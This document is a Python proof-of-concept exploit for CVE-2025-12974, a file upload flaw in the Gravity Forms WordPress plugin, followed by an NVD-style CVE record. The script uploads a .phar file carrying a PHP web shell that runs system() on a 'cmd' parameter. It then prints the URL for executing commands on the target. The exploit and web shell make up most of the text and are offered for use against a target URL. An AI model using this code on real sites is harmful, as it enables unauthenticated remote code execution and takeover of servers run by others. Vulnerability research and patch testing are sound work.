CVE-2025-12974

import requests import sys # CVE-2025-12974 PoC - Gravity Forms Arbitrary File Upload # Target: WordPress site with vulnerable Gravity Forms plugin (<=2.9.21.1) def upload_phar(target_url, upload_path=None): """ Upload malicious .phar file via Gravity Forms chunked upload mechanism Args: target_url: Base URL of the WordPress site upload_path: Discovered or enumerated upload path (optional) Note: Requires server configuration where .phar files are processed as PHP """ # Malicious .phar file content with PHP payload # This creates a PHAR archive that executes arbitrary PHP code malicious_phar = b''' <?php // CVE-2025-12974 - Malicious PHAR payload // This will be executed when the .phar file is accessed if(isset($_GET["cmd"])) { system($_GET["cmd"]); } ?> ''' # Chunked upload endpoint (legacy mechanism) endpoint = f"{target_url}/wp-json/gf/v2/chunked_upload" headers = { "Content-Type": "application/octet-stream", "X-GF-Chunk-Index": "0", "X-GF-Chunk-Total": "1", "X-GF-Chunk-Hash": "malicious_phar_hash", "X-GF-Filename": "evil.phar" } try: response = requests.post(endpoint, data=malicious_phar, headers=headers, timeout=30) if response.status_code == 200: result = response.json() uploaded_path = result.get("temp_filename", "") print(f"[+] Successfully uploaded malicious .phar file") print(f"[+] Access the file at: {target_url}/wp-content/uploads/{uploaded_path}") print(f"[+] Execute commands: {target_url}/wp-content/uploads/{uploaded_path}?cmd=whoami") return True else: print(f"[-] Upload failed with status code: {response.status_code}") print(f"[-] Response: {response.text}") return False except requests.exceptions.RequestException as e: print(f"[-] Request failed: {str(e)}") return False if __name__ == "__main__": if len(sys.argv) < 2: print("Usage: python cve-2025-12974.py <target_url>") print("Example: python cve-2025-12974.py https://example.com") sys.exit(1) target = sys.argv[1].rstrip("/") upload_phar(target)

{"cve": {"id": "CVE-2025-12974", "sourceIdentifier": "[email protected]", "published": "2025-11-18T04:15:43.583", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Gravity Forms plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the legacy chunked upload mechanism in all versions up to, and including, 2.9.21.1. This is due to the extension blacklist not including .phar files, which can be uploaded through the chunked upload mechanism. This makes it possible for unauthenticated attackers to upload executable .phar files and achieve remote code execution on the server, granted they can discover or enumerate the upload path. In order for an attacker to achieve RCE, the web server needs to be set up to process .phar file as PHP via file handler mapping or similar."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-434"}]}], "references": [{"url": "https://docs.gravityforms.com/gravityforms-change-log/", "source": "[email protected]"}, {"url": "https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/common/common.php#L4178", "source": "[email protected]"}, {"url": "https://github.com/pronamic/gravityforms/blob/06de1b7e169e4f073e9d0d491e17b89365b48c20/includes/upload.php#L97", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/b6395439-da45-4b64-8e30-b106dffd46c1?source=cve", "source": "[email protected]"}]}}